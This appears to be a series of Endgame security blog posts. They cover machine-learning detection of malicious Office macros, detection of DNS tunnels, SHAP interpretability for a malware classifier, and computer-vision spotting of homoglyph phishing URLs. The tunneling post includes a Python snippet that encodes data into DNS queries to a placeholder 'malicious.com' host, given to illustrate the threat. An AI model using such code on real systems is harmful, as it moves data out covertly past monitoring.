    Macro-based phishing attacks are those that deceive victims into downloading a malicious document and enabling malicious embedded scripts to run, usually by clicking on an “Enable Macros” button within a Microsoft Office document.  To counter these attacks, Endgame has enhanced its machine learning technology MalwareScore™ to prevent execution of documents carrying malicious MS Office macros. Following on the heels of Endgame’s other machine learning based MalwareScore protections - Windows PE files and Mac executable files - our latest innovation applies machine learning to protect against malicious macros, one of the most impactful security challenges.  

    MalwareScore combines the expertise of Endgame’s malware researchers and data scientists in a single, lightweight model which provides unparalleled protection against known and unknown macro-based attacks. Detecting malicious macros using machine learning introduced numerous unique challenges, which we discuss further here.  Confident in our approach to macro-detection, Endgame has also released this enhancement into VirusTotal as part of our commitment to transparency and growing the community.

     

    Defending Against Non-Macro Based Document Phishing Attacks

    There are other ways to deliver a malicious payload via a document.  Weaponized software vulnerabilities pop up regularly, and attackers can attempt to gain access through exploitation.  Endgame provides great exploitation protection. There are also legitimate features beyond macros that are abused by attackers to execute code.  For instance, the criminal group Fin7 has exploited legacy features in Microsoft applications such as Dynamic Data Exchange. To address these less common payloads, Endgame provides a broad and deep set of signatureless capabilities which provide unparalleled protection around applications commonly targeted by attackers.  This set of protections also provides a layer of defense for the 1% of malicious macros which will get through MalwareScore.  Effective endpoint defenses require layers operating together.

     

    Making Clicking Safe Again

    As long as phishing remains a lucrative, inexpensive, and high-return approach, criminals and nation-state attackers will continue to innovate, causing major financial, political, and potentially physical destruction.  Endgame alters this risk calculus by protecting against those document-based phishing attacks with and without macros, stopping the attackers before data loss or destruction can occur. We’re excited to introduce this enhancement to our machine learning technology simultaneously making it available for public access in Google’s VirusTotal and to commercial customers as part of the launch of Endgame Release 3.0.

    If you’ll be at Black Hat, swing by our booth #1328 for hourly demonstrations of our multilayer endpoint protection platform. We will show how Endgame stops attacks pre-execution, orchestrates the quarantine and cleanup of all endpoints and removal from email servers, and stops both current and future clickers.

    How Endgame Protects Against Phishing from Macro-Enabled Documents

    $
    0
    0

    Phishing continues to be one of the most effective methods of compromise according to Verizon’s Data Breach Investigations Report.  Adversaries often use crafted documents containing malicious macros and a deceptive lure to achieve initial access to target users and networks.  These macro-based attacks remain difficult to stop for numerous reasons. Adversaries are becoming more clever with their phishing schemes, and mail filtering will never stop a determined adversary from delivering payloads to inboxes. In addition, human nature and a lot of history tell us that users will open and interact with malicious attachments. Finally, security products do a poor job of providing the necessary safety net of detection and prevention without prior knowledge of the specific attack.

    Today, we are introducing MalwareScore for macros - a machine learning-based detector for malicious macro-enabled Microsoft Office documents - to protect against phishing designed to gain a foothold on a targeted system.  This new capability was just released into VirusTotal and prevents compromise before malicious macro documents are even opened. Endgame already provides extensive signatureless protection against this class of attack, including prevention against documents exploiting a vulnerability in rendering software like Adobe Reader or Microsoft Word, inline protections against non-macro attacks, tradecraft analytics on suspicious behaviors of commonly targeted software like Office, and our full suite of protections against payloads delivered via the initial macro-based attack. With the addition of MalwareScore for macros, Endgame provides unparalleled protection against phishing campaigns with macro-enabled documents that seek to gain access to endpoints.


     

    World, Meet MalwareScore for Macros

    Endgame has already proven excellence in known and unknown malware detection with MalwareScore for Windows PE files and Mac executable files.  To counter malicious macros, Endgame Research built MalwareScore for macros, a static machine-learning driven malware protection for malicious Office macros.  This high-efficacy macro malware classifier was released today in VirusTotal and will soon be available to Endgame customers in our 3.0 product release.

    In creating MalwareScore for macros, we applied many lessons-learned from building and maintaining MalwareScore for Windows and Mac.  However, creating a classifier for macros has its own quirks and challenges to overcome. There are multiple file types to consider, unique issues related to file similarity, totally new feature engineering requirements, difficulty in gathering large benign and malicious datasets, and difficulty generating high quality labels on the training and test data.  These are just a few of the challenges we encountered. Before addressing how we overcame each of these challenges in creating MalwareScore for macros, let’s take a quick look at why this protection is so essential in the first place.
     

    Macros Gone Bad

    Visual Basic for Applications (VBA) has been used in Office documents since it was introduced  in Excel in 1993. One of the first widespread macro viruses, Melissa, appeared in 1999 and forced several tech giants to shut down their email systems to prevent the virus from spreading. Since then, malicious Word and Excel documents with seemingly important information have been flowing freely to inboxes everywhere with cleverly constructed content encouraging the user to click “Enable Content”.  The most effective of today’s macro-enabled attacks are not the easy to spot scam emails of previous eras, but rather are extremely sophisticated. They leverage everything from modifications to real documents to the vast wealth of personal information available online to blurry text and fake mentions of unlocking encryption to successfully deliver both targeted and widespread phishing attacks.  

    Email remains the most frequent delivery mechanism for phishing attacks, but social media also is an increasingly popular attack vector.  Groups such as Iran’s Cobalt Gypsy/Oil Rig target individuals at strategic organizations, connecting with them via social media and eventually convincing them to download malicious macro-enabled documents onto their corporate networks.  Earlier this year, the Pyeongchang Winter Olympics served as a decoy to target organizations with a macro-based phishing campaign, hoping the malicious document would enable compromise and access to corporate information.  APT28 and other aggressive Russian actors have consistently used macro-enabled documents to gain access to their highest value targets in the US and abroad.  

    We could cite dozens or hundreds of additional examples, but campaigns have similarities.  The weaponized macro-based documents often evade detection because they are multi-stage, take advantage of legitimate functionality within Windows and the Office toolsuite, and leverage credible-looking user prompts for execution.  Given how frequently the attack documents change and how legitimate these attacks appear, a machine learning-based classification approach can drastically improve prevention rates when modeled carefully and robustly. However, this is not a trivial task.

     

    Challenges with Creating A Macro-Based Classifier

    When creating a macro-based classifier, there are a range of unique considerations.  Many years of evolving versions of Office which the classifier must support, several distinct file types, and the absence of trustworthy labels on samples, especially newly in-the-wild malicious documents, are some of the special challenges to overcome.  There also are the typical considerations of guaranteeing high detection efficacy, negligible false positives, and performing at scale and speed. I’ll address four of the most important challenges we solved when creating this new capability: 1) Parsing macros effectively; 2) Feature engineering; 3) Lack of solid labels; and 4) Identifying similar samples across different documents.

     

    Parsing macros effectively

    Parsing macro-enabled Office docs is an exercise in enumeration and iteration.  Not only are there multiple file types such as Word documents, Excel spreadsheets, and other document types to deal with, there are also multiple Office versions that have different ideas of file structure. Pre-2007 Office versions use a binary file format, whereas 2007 and later use an XML-based format that is effectively a zip archive housing the contents.

    By checking for specific combinations of byte strings in the file, we can determine the type and format of the file and thus the location of relevant code within the file.  With that in hand, the OLE (Object Linking and Embedding) streams must be parsed to get the full account of macro text. OLE streams in documents are analogous to an internal filesystem and can comprise very few streams or many thousands.  Parsing these streams lets us determine which contain macro code and collect that code as text for analysis.
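
    The post does not name the parser used internally; as one illustration, the same enumeration can be sketched with the open source oletools library (a stand-in here), using a hypothetical filename:

    from oletools.olevba import VBA_Parser

    def extract_macro_text(path):
        """Collect the VBA source from every macro-carrying OLE stream in a document."""
        vba = VBA_Parser(path)            # handles both the legacy binary and zip-based formats
        sources = []
        if vba.detect_vba_macros():
            for _, stream_path, _, vba_code in vba.extract_macros():
                sources.append(vba_code)  # stream_path identifies where the code lived
        vba.close()
        return "\n".join(sources)

    macro_text = extract_macro_text("suspicious.docm")  # hypothetical sample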

    Finally, once all code streams (see Figure 1 below) are parsed, the text segments are passed to our feature generation process, described next.  

     

    Figure 1: Office VBA File Format Structure (Source: Microsoft)

     

    Feature Engineering

    As with most applied machine learning problems, feature engineering for malicious macro classification is one of the most important and impactful, and thus guarded, steps in the model creation process.  Feature engineering means converting raw input, in this case the code streams we parsed in the previous step, into an array of numbers which our chosen modeling software can use for building a model.

    For this classifier, our feature engineering focused on analysis of code streams, driven by close collaboration between reverse engineers, threat researchers, and data scientists.  Some of our features depend on counting reserved keywords such as “connect” and “thisdocument”. Others collect string metrics, perhaps to detect obfuscation or encoding, while others conduct more involved textual analysis.  All in all, we generate hundreds of features per sample for analysis. The final feature set is the end product of months of iteration, experimentation, and testing to ensure our desired levels of efficacy.
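
    The production feature set is not public, but a minimal sketch of the kinds of features described above (keyword counts, simple string metrics, and a text-level statistic) might look like the following; the keyword list is purely illustrative:

    import math
    import re

    KEYWORDS = ["connect", "thisdocument", "shell", "createobject"]  # illustrative only

    def macro_features(code):
        lower = code.lower()
        features = {"count_" + kw: lower.count(kw) for kw in KEYWORDS}
        # Simple string metrics that can hint at obfuscation or encoded payloads
        strings = re.findall(r'"([^"]*)"', code)
        features["num_strings"] = len(strings)
        features["max_string_len"] = max((len(s) for s in strings), default=0)
        # Shannon entropy of the raw macro text as a crude textual statistic
        total = len(code) or 1
        probs = [code.count(c) / total for c in set(code)]
        features["entropy"] = -sum(p * math.log2(p) for p in probs)
        return features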

     

    Lack of Solid Labels

    Supervised classifiers require large, reliably labeled datasets.  This is a significant challenge for any machine learning problem in security, but good labels for macros are especially hard to come by.  Having no AVs call a file bad is not a stellar indicator of non-maliciousness for any file in security, and that’s an issue we’ve dealt with successfully with past classifiers.  In the realm of macro enabled documents, this issue is especially challenging.

    To increase certainty in a label, the industry often relies on internal, and sometimes external, crowdsourcing to generate signatures and compile blacklists.  We sought to build upon that idea by developing a framework we dubbed Active Labeling to make it quick and easy for Endgame reverse engineers to provide a label for a given sample, and have that feed back into the training pipeline.

    First, we generated the list of samples that would make the “biggest” impact on classification performance, specifically targeting samples that have significant uncertainty or that can most influence the decision boundary of our classifier.  These samples are often scored at the good/bad threshold for a given model (e.g. 0.49-0.51). Next, we automated the extraction of the macro, IOCs, and any other metadata that could aid in the labeling of a sample, and displayed it to the analyst in a web UI.  This provides an intuitive interface for the analysts to grab a sample and make a judgement as quickly as possible. These "human labeled” samples are fed back into our machine learning training to further improve performance. Active Labeling allows us not only to detect troublesome samples, but to efficiently enhance and refine our future machine learning models to better predict new and unknown samples.  Our classifier would not have been shippable without significant effort in this area.
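
    A minimal sketch of the sample-selection step is below, assuming each candidate carries a model score between 0 and 1; the field name, thresholds, and budget are hypothetical:

    def select_for_labeling(scored_samples, low=0.49, high=0.51, budget=200):
        """Pick the samples sitting closest to the good/bad decision boundary."""
        near_boundary = [s for s in scored_samples if low <= s["score"] <= high]
        near_boundary.sort(key=lambda s: abs(s["score"] - 0.5))  # most uncertain first
        return near_boundary[:budget]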

     

    Identifying Similar Samples

    One of the few things everyone (mostly) agrees about in security is how to identify a file.  The file hash, such as SHA-256, uniquely identifies each malware sample. With PE or Mach-O executable malware, because of polymorphic malware and code modifications over time, looking for a hash you already know about is an imperfect method for finding that malware in the future.  Despite it not being a great solution for robust future detections, a hash is a very useful and in fact an industry-standard quality to key off of when it comes to whitelisting, blacklisting, and similar actions. We need to think a little differently about macro-enabled documents.

    Just like with executables, the hash of a document can be used to find that exact same file in a network.  However, if someone changes even one cell in the fake spreadsheet, the entire file hash changes while the malicious macro, the part we are most concerned about, remains unaffected.  We should instead look at the macro itself, not the phishing content, as our anchor for sameness.

    We’ve implemented an idea similar to ImpHash which we internally call MacroHash.  Instead of hashing the entire file, we perform some light sanitization on the OLE streams, order them, and hash them in aggregate.  This way we uniquely fingerprint the same combination of macros across multiple host Office documents, and are unaffected by changes in the file contents (and thus the file hash) when seeking identical samples in our training set or providing necessary customer-facing features like whitelisting.
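
    The exact sanitization rules are internal; as a rough sketch of the idea, normalize each macro stream, order the streams, and hash them as one unit:

    import hashlib

    def macro_hash(macro_streams):
        """Fingerprint the macro content independently of the surrounding document."""
        sanitized = []
        for stream in macro_streams:
            lines = [line.strip().lower() for line in stream.splitlines() if line.strip()]
            sanitized.append("\n".join(lines))      # light, order-preserving cleanup per stream
        digest = hashlib.sha256()
        for stream in sorted(sanitized):            # order streams so the hash is stable
            digest.update(stream.encode("utf-8"))
        return digest.hexdigest()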

     

    Conclusion

    MalwareScore for macros is now live in VirusTotal! Macro-enabled phishing attacks aren’t going away anytime soon.  They continue to be the easiest way into many target networks, and defenses have been woefully inadequate. Creating MalwareScore for macros was truly a collaborative process across Endgame requiring significant cross-functional innovation.  We’re very excited to share it with the wider security community through inclusion in VirusTotal. The description of challenges we faced when building MalwareScore for macros furthers our commitment to demystifying security and provides transparency to our current and future customers about how Endgame takes features from idea to product.  

    Plight at the End of the Tunnel

    $
    0
    0

    DNS tunneling is a technique that misuses the Domain Name System (DNS) to encode another protocol’s data into a series of DNS queries and response messages. It received a lot of attention a few years ago, when malware families like Feederbot and the Morto worm were discovered using DNS tunneling as a command and control (C&C) channel.

    However, as Internet architecture has evolved, many of the techniques that were developed to detect DNS tunnels now create false positives. Evolutionary changes to the Internet, which include the widespread use of Content Delivery Networks and unconventional applications of DNS such as reputation/blocklist lookups and telemetry, have made it harder to detect DNS tunnels. Because of these challenges, and given their ongoing popularity as an attack vector for data theft, I revisited this topic and recently presented some of the results of my research at BSides Charm. In this blogpost, I’ll walk through the basics of DNS tunneling, some challenges with detection, and offer recommendations for detecting these attacks while limiting false positives.

     

    Back to basics

    DNS is mainly known for mapping domain names to IP addresses. This is achieved using A and AAAA records for IPv4 and IPv6 addresses, respectively. In addition to these records, DNS also provides a range of other record types for a wide variety of applications. For example, CNAME records are used to create aliases for a domain name, MX records are used to discover mail exchangers, and TXT records are used to exchange arbitrary data associated with the domain.

    Upstream data in DNS query field and downstream data in DNS response RR fields

    Since DNS is such a fundamental protocol, outbound DNS access is enabled in even very restrictive environments. DNS tunneling abuses this ubiquity of DNS to create covert channels for C&C or data exfiltration. DNS tunnels work by sending upstream data in a DNS query field and receiving downstream data in DNS response RR fields.

    A domain name is limited to 255 characters from the character set [a-z0-9-]. In order to send binary data upstream via this field, the data must be encoded to meet this character set requirement. The following code illustrates how upstream data may be encoded.

     

    import base64
    import socket

    # binary_data: the raw bytes to exfiltrate
    data = base64.b32encode(binary_data).decode('ascii').lower().rstrip('=')
    csize = 255 - len('.malicious.com')
    for chunk in (data[i:i+csize] for i in range(0, len(data), csize)):
        # each DNS label is limited to 63 characters
        labels = [chunk[j:j+63] for j in range(0, len(chunk), 63)]
        fqdn = '.'.join(labels) + '.malicious.com'
        socket.gethostbyname(fqdn)
    

     

    The downstream data is sent using various resource records (RR). Each RR format has a size and character set limitation. PRIVATE and TXT records allow 216 [a-zA-Z0-9-+] characters. CNAME, MX and SRV records have the same format as a DNS query. The size and character-set restrictions of each RR record put a limitation on the amount of data and the encoding function that can be used. The adversary’s decision to use one RR type over the other in a covert channel comes down to stealth versus bandwidth as data transfer requirements are balanced with the desire to remain undetected.

    DNS tunneling has some properties that set it apart from other tunneling techniques like ICMP tunneling:

    1. DNS is ubiquitous. It is enabled even in the most restrictive networks. On airline and hotel WiFi, for instance, DHCP and DNS are usually the two protocols enabled before all other traffic is restricted behind a paywall.

    2. DNS tunneling is relatively performant. As far as covert tunneling protocols go, DNS tunneling performs well in terms of latency and bandwidth.

    3. It doesn’t require a direct connection between the attacker and the victim. The DNS traffic is usually relayed through a recursive resolver that performs queries iteratively on behalf of the client. Netflow collected on the host will not reveal a direct connection to the attacker.

    4. Upstream only channels can be very stealthy. If an attacker is only interested in an upstream channel, for example data exfiltration, DNS tunneling doesn’t have to use the DNS responses. It may allow all of the DNS queries to fail with NXDOMAIN or a FORMAT_ERR, and go under the radar of DNS monitoring applications.

    5. Built-in load balancing. Lastly, DNS tunnels don’t have to use a single domain name to exchange traffic. The traffic can be spread over multiple domains sharing the same nameserver. This provides additional stealth and resilience, since no single domain would stand out as an outlier in the network traffic baselines.

     

    The False Positive Challenge

    DNS tunnels encode binary data into an ASCII format, which is then transferred as a domain name in a DNS query. Such domain names, generated from encoded binary data, have high entropy. Moreover, in order to achieve high bandwidth, DNS tunnels encode the largest possible chunk of binary data in each packet, yielding large DNS packets. So, given a stream of DNS traffic from a DNS tunnel, one would observe a large number of long subdomains under the registered domain, each with high entropy.

    In contrast, web traffic is usually comprised of domain names that are short, easy to remember, and derived from a spoken language. Therefore, normal DNS traffic is expected to have smaller DNS packets containing domain names with low entropy.
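
    To make this contrast concrete, here is a quick Shannon entropy calculation over a single DNS label; the example strings are illustrative:

    import math
    from collections import Counter

    def shannon_entropy(label):
        counts = Counter(label)
        total = len(label)
        return -sum((n / total) * math.log2(n / total) for n in counts.values())

    shannon_entropy("gez3tmzsgm4tempq")   # encoded-looking label, roughly 3.2 bits per character
    shannon_entropy("mail")               # human-readable label, 2.0 bits per character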

    High entropy, a large number of subdomains, and large packet size may seem like reliable indicators of a DNS tunnel. But that approach now yields an unmanageable volume of false positives.

    One of the primary reasons for this is the advent of CDNs (Content Delivery Networks). Consider a domain that is hosted on a large CDN. The content delivery mechanism usually works by creating a CNAME record (i.e. alias), for each hosted customer domain to a unique, often random-looking subdomain of a CDN domain. The DNS resolution of this CNAME is how the content delivery optimization is actually delivered.

    DNS resolution of www.baltimoresun.com

     

    It is easy to see the parallels of this property to a DNS tunnel - a large number of subdomains, each with high entropy.

    This large number of subdomains may not be limited to a small set of CDN domains. Some services create a large number of sub-domains directly under the customer’s primary registered domain.

    One of the many DNS queries generated from browsing www.tomshardware.com

    In addition, some services utilize DNS for non-conventional use cases like file/domain reputation lookups, telemetry, etc. Spamhaus provides a DNSBL service to look up the reputation of domains. Team Cymru provides an extensive ASN & BGP peer lookup service over DNS. DNS traffic to these services also yields false positives.

    In the past, SOCs have gotten away with reactive whitelisting. But as more and more such services come online, a whitelisting approach just doesn’t scale.

     

    Layered Approach to Detecting DNS Tunnels

    Given these challenges, we need a layered approach to sift through DNS traffic, with each layer attacking a particular aspect of a DNS tunnel. These layers consist of record types and sizes and access patterns.

     

    Record types and record sizes

     

    Resource Record types

    NULL and Private RR types have very limited valid use cases. These RRs in DNS traffic should raise an alarm. TXT records have some valid domain specific use cases. But in spite of that, the number and size of TXT RRs per domain can be used to detect the simplest of DNS tunnels.

     

    Question and RR size

    DNS packet size alone is no longer a good indicator of DNS tunnels. Many domains provide a large number of records for redundancy and load balancing. In addition, AAAA resource records are large and can skew the baseline. If we dig deeper into the DNS packet, query length and individual RR size can be a good feature used for detection.

    In particular, subdomains longer than 180 characters and two or more labels longer than 52 characters should be considered highly suspicious. These thresholds are evident from the following two graphs plotting maximum query length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and malicious DNS tunnels are plotted in red.

    Maximum query length on the x-axis, frequency in log scale on the y-axis

    Similarly, the size of individual RRs in each response can be a good indicator of the existence of a DNS tunnel. Consider the following two graphs plotting the maximum RR length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and DNS tunnel domains are plotted in red.

    Maximum Resource Record length on the x-axis, frequency in log scale on the y-axis

    Outliers in the subdomain’s length, number of labels in the subdomain, and maximum resource record length together help narrow down the field to a small set of potential candidates of a DNS tunnel.
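
    Using the thresholds above, a first-pass filter over parsed queries might look like the following sketch; it assumes the FQDN ends with the registered domain, and the cutoff values are the ones discussed in this section:

    def looks_like_tunnel_query(fqdn, registered_domain):
        """Flag queries whose subdomain portion looks like encoded data."""
        subdomain = fqdn[: -len(registered_domain)].rstrip(".")
        labels = subdomain.split(".") if subdomain else []
        long_labels = sum(1 for label in labels if len(label) > 52)
        return len(subdomain) > 180 or long_labels >= 2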

     

    Access patterns

     

    Unique subdomains

    As mentioned earlier, the number of subdomains per domain doesn’t always indicate a DNS tunnel. You’ll find that CDNs domain names (e.g., akamaiedge[.]com) or domains that host its user content on subdomains (e.g., blogspot.com) also create a large number of subdomains. What separates a DNS tunnel domain from other domains that have a large number of subdomains is repeat queries. In particular, subdomains created by DNS tunnels are usually only queried once. Therefore, the ratio of the number of unique subdomains to the number of queries per domain works as a much better indicator of a DNS tunnel.
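
    A sketch of that ratio, computed per registered domain from a stream of observed queries:

    from collections import defaultdict

    subdomains_seen = defaultdict(list)   # registered domain -> every subdomain queried

    def record_query(registered_domain, subdomain):
        subdomains_seen[registered_domain].append(subdomain)

    def uniqueness_ratio(registered_domain):
        """Close to 1.0 means almost every query hits a brand-new subdomain, as tunnels do."""
        queries = subdomains_seen[registered_domain]
        return len(set(queries)) / len(queries) if queries else 0.0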

     

    Loose ends

    Lastly, DNS tunnels leave some loose ends. To understand that, let’s consider the response from dig www[.]amazon[.]com:

     

    DNS resolution of www.amazon.com

     

    A CNAME record sets another domain as an alias of the queried domain. The new CNAME FQDN may in turn be an alias of a third domain. But, eventually, the alias domain resolves to an IP address, either with an A/AAAA record inserted proactively, or via an explicit query. The DNS query is usually a precursor to an IP connection to the resolved FQDN. The same is true for MX or SRV records. DNS tunnels, on the other hand, don’t have that requirement. There is no intention to ever make an IP connection to the resolved domain name. If we track all RRs for a domain and find that it leaves a large number of those new RRs unresolved to an IP address, it is a strong indicator of a potential DNS tunnel.
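
    Tracking those loose ends reduces to bookkeeping: for each candidate domain, count how many of the names handed back in its RRs are never subsequently resolved to an address. A minimal sketch:

    def unresolved_ratio(rr_targets, resolved_names):
        """Fraction of CNAME/MX/SRV targets that never appear in any A/AAAA resolution."""
        if not rr_targets:
            return 0.0
        dangling = [name for name in rr_targets if name not in resolved_names]
        return len(dangling) / len(rr_targets)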

     

    Conclusion

    The ubiquity of DNS makes it easy for an attacker to create DNS tunnels and go undetected under the large volume of DNS logs that an enterprise usually generates. But it isn’t particularly hard to employ the aforementioned techniques to detect DNS tunnels. While DNS tunnels may successfully hide data in the protocol fields, it is much harder to feign the behavior and access patterns of benign DNS use.

    Now that we can detect DNS tunnels reliably, it is important to provide a final word on DNS privacy and its implications for DNS tunneling. There has been a lot of interest lately in providing DNS privacy to consumers. There are two protocols that continue to garner support and widespread deployment - DoH (DNS over HTTPS) and DNS over TLS. These protocols provide confidentiality for DNS lookups to thwart passive introspection. In the future, DNS tunnels may also utilize these protocols to evade detection. In turn, our detection mechanisms will evolve by relying more on access patterns and higher-order behaviors than on packet introspection.

     

    Opening the Machine Learning Black Box with Model Interpretability

    $
    0
    0

    When optimizing machine learning (ML) models, model performance is often prioritized over model interpretability. However, in the field of information security, interpretability is a sought-after feature, especially in the realm of malware classification. By understanding why a model classifies a binary as benign or malicious, security practitioners are better equipped to remediate an alert.

    We worked with the ember benchmark model, a classifier that is currently not interpretable, to design a measure of interpretability that will determine which features contribute to the model’s predictions. This enables future ember users to quickly interpret and explain their findings, highlighting the value of focusing on both performance and interpretability in ML models.

     

    Methods for Model Interpretability

    There are many ways to approach model interpretability, including partial dependence plots (PDP), local interpretable model-agnostic explanations (LIME), and Shapley values.

    The Shapley values method, which quantifies how much each model feature contributes to the model’s prediction, is the only one that can determine each feature’s effect on a global scale and thus give a full model explanation. For this reason we chose to use SHapley Additive exPlanation (SHAP) values, an extension of the Shapley values method, to assess interpretability for the ember benchmark model. For a given model, all the SHAP values sum to the overall difference between the model’s prediction and the baseline prediction made without considering feature effects. The SHAP paper is available here and the open source code we utilized is available here.

    It is important to note how SHAP values are correlated to file classification. When interpreting malware classification models, lower SHAP values push the model towards classifying a file as benign, whereas higher SHAP values push the model towards classifying a file as malicious.

     

    Applying SHAP for Model Interpretability

    We applied SHAP value-based interpretability to the ember model in two ways: model summary and single file. Each of these are discussed below.

     

    Model Summary

    The ember dataset consists of raw features extracted from over one million files/samples that are used as training/test sets for the ember model. Each file’s raw features are converted into 2351 vectorized features. By creating a SHAP summary plot for the model, we were able to determine the 20 features (out of 2351) that affected the model the most and how changes in these values affect the model’s prediction.

     

    Figure 1: A summary for all the files/samples in the ember dataset of the correlation between feature values and SHAP values

     

    This plot shows how high and low feature values are related to SHAP values. For example, Feature 637 (machine type) is the most important model feature because high and low feature values directly correlate to high and low SHAP values. In comparison, other model features are less important because there is less distinction between high and low feature values, and their resulting SHAP values are closer to zero. This can be seen with Feature 504 (byte entropy histogram), as its corresponding SHAP values are closer to zero and thus have less impact on the model. We were able to use this plot to get a better understanding of how certain features affected the ember model’s decisions.
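
    For readers who want to reproduce this kind of summary view, a minimal sketch using the open source shap package might look like the following. The model path and feature file are hypothetical; this is the standard shap workflow rather than our exact pipeline:

    import lightgbm as lgb
    import numpy as np
    import shap

    model = lgb.Booster(model_file="ember_model.txt")   # hypothetical path to the trained model
    X = np.load("ember_features.npy")                   # hypothetical (n_samples, 2351) feature matrix
    explainer = shap.TreeExplainer(model)
    shap_values = explainer.shap_values(X)               # one row of SHAP values per sample
    shap.summary_plot(shap_values, X, max_display=20)    # top-20 view, as in Figure 1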

     

    Single File

    While understanding features’ effects on the model is important, ideally we want to provide a file and identify how the features in that file specifically influence the model’s prediction.  

    Within the ember dataset, each file’s raw features are already converted into 2351 vectorized features and categorized into eight feature groups (Byte Histogram, Byte Entropy Histogram, String Extractor, General File Info, Header File Info, Section Info, Imports Info, and Exports Info).

    It would be possible to visualize how each of these 2351 features contributes to the model; however, we determined that the visualization would be too cluttered for a user to extract any meaningful information. Instead, it would be more informative to understand how each feature group contributed to the final prediction so that the user would know what part of the file to scrutinize more.

    We added together the SHAP values for all the features in each feature group to get an overall SHAP value for each group, and then created a force plot (see example below) to visualize each feature group’s overall effect on the model’s prediction.

    Figure 2: Most of the eight feature groups in this specific file push the model towards classifying the file as malicious (red)
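
    The grouping step behind this plot is simple arithmetic: sum the SHAP values that fall inside each group’s slice of the 2351-dimension vector. The group boundaries below are placeholders rather than ember’s real offsets, and shap_values is the array from the earlier sketch:

    import numpy as np

    GROUPS = {                                   # placeholder slices, not ember's real offsets
        "ByteHistogram": (0, 256),
        "ByteEntropyHistogram": (256, 512),
        "Strings": (512, 616),
    }

    def group_shap(shap_row):
        """Collapse per-feature SHAP values into one value per feature group."""
        return {name: float(np.sum(shap_row[start:end])) for name, (start, end) in GROUPS.items()}

    grouped = group_shap(shap_values[0])          # these grouped values feed the force plot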

     

    In addition to feature group importance, we also provide a list of the top five features in the file that contribute most to the prediction, as well as each feature’s information. An example can be seen here:

     


    While we can say which features contributed most to the model’s prediction and what groups/subgroups they are in, the next step would be to identify what exactly that feature represents. For example, from the visual above, we can say that Feature 620 is a part of the General File Information, specifically the exports section, but ideally, we would be able to determine exactly which export contributes to how the file is classified.

     

    Conclusion

    With the possible extensions mentioned above, we now have a measure of model interpretability for the ember model that will help us better understand why it classifies certain files as benign or malicious. Ideally, this interpretability feature could be implemented for other classifiers so that researchers in information security can quickly identify and respond to a security alert.

    As shown through the ember model, interpretability provides more detailed insights about ML models. These insights will allow researchers to move past current ML black box predictions, thus highlighting the importance of model interpretability and transparency within ML models.

     


    Detecting Phishing With Computer Vision: Part 1, Blazar

    $
    0
    0

    Yesterday, Microsoft announced the discovery and removal of websites spoofed by the Russian military that mimic real Senate and political organizations' sites. As their blog notes, “Attackers want their attacks to look as realistic as possible and they therefore create websites and URLs that look like sites their targeted victims would expect to receive email from or visit.” These are exactly the kinds of attacks that often host malware or steal credentials, and are well-suited for detection by our computer-vision based phishing detection tool, Blazar. Blazar is one of two recent computer vision-based projects by Endgame Research, illustrating how valuable computer vision can be to protect against phishing.

    This high-profile attack demonstrates how prevalent phishing attacks remain. Modern day phishing has been around since the advent of email and is simply based on classic confidence scams. Prevention methods have been around just as long, and they work great to significantly reduce the more common and less creative attempts. However, as the Microsoft announcement illustrates, phishing remains one of the most common methods of entry or attack for a malicious actor. While criminals often use phishing as part of an attack driven by financial gain, nation-states or state-affiliated groups increasingly use phishing for espionage.

    At Endgame, we’re constantly pushing boundaries and developing new tools and techniques to solve security problems. We have stayed on top of the range of new applications of computer vision, but saw that it was underused in the information security space. In this and a subsequent blog we will demonstrate how computer vision can be applied to the phishing challenge, including an introduction to the two approaches we presented at BSidesLV: 1) Blazar: URL spoofing detection, the focus of this first post; 2) SpeedGrapher: MS Word macro malware detection, which will be covered in detail in the subsequent post.

    These detection techniques each use computer vision, but they focus on different aspects and tricks used in phishing campaigns to protect against a greater range of attacks. Blazar detects malicious URLs that masquerade as legitimate ones, the tactic used in the Russian military hacking operation announced by Microsoft. In a subsequent post, we’ll describe SpeedGrapher, which looks at the first page of Word documents to “see” if the contents ask you to do something suspicious. Our techniques, combined with traditional phishing detection technologies, can provide a powerful defense against these prevalent attacks.

     

    Current Methods of Phishing

    According to the Verizon 2018 Data Breach Investigations Report, approximately 70% of breaches associated with nation-state or state-affiliated actors involved phishing. Phishing continues to be effective, and is getting more sophisticated, more targeted, and harder to detect. 4% of people targeted will click on the attachment, and 94% of the time the attachment is malicious. Only 17% of attacks are reported, and of those, it takes 30 minutes on average to report them. The costs of phishing to American businesses continue to grow, reaching over half a billion dollars last year.

    Many strategies exist, and help greatly, to cut down on the number of phishing emails from larger, more obvious campaigns. Email spam filters do a wonderful job. If you doubt this, look at how many have already been caught by your email client/provider. These often work because other users flag spam and that information can be aggregated and distributed to everyone.

    Most email hosts also use third party antivirus software to scan email attachments for potentially malicious files and warn the user or remove the offending files. Modern browsers also do us all a favor by curating and maintaining blacklists of malicious or suspicious domains. They will often block the initial loading of a site and instead warn the user to proceed with caution.

    Finally, the last line of defense has traditionally been the user. This takes the form of IT and security training. Many large companies have, as they should, regular required training for how to detect suspicious messages over email and social media. While often boring and burdensome, regular training can keep users aware and alert.

    However, as stated before, phishing is still a problem. These solutions are incomplete, and more work is necessary on the defensive side to keep up with the mouse-and-mousetrap nature of phishing. To help out, we’re showcasing computer vision based approaches to detect malicious intent.

     

    Why Computer Vision

    Computer vision has come a long way from detecting cats in YouTube videos. You can now also detect raccoons:

     

     

    It is also used daily in fields from medical imaging to self-driving cars.

     

    In general, computer vision works well when you can answer “yes” to the question: “Can an attentive user identify this?” For our specific example, the question is “Can an attentive user identify phishing?” So, dear user, let us test the question!

    Below is an example email. Would you click the link and download the FlashPlayer update?

     

     

    Probably not. You’ll see that the regular “b” character in “adobe” was replaced with a “ḅ” (U+1E05), which directs to a completely different domain.

    These kinds of attacks are called homoglyph attacks. A homoglyph attack, as the name suggests, is a deceptive attack exploiting the visual similarity of different characters. For the purpose of this project we extend the definition slightly to include character additions and removals. Some examples are:

     

    This isn’t just a made up or academic problem. The fake adobe update example was from an actual campaign in September 2017 to distribute the betabot trojan.

     

    Possible Methods for Detection

    One approach to detect these spoofs is to use edit distance, which counts the number of insertions, deletions, and substitutions. For example:

     

     

    This works to an extent, but runs into some real problems when extended character sets are allowed. We could easily replace “microsoft.com” with other Unicode characters so that it is nearly identical visually but has an edit distance of 9, replacing the entirety of “microsoft” with other characters.
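
    For reference, the plain, unweighted edit distance is only a few lines of Python. This is a minimal sketch; the example strings and expected value are just illustrative:

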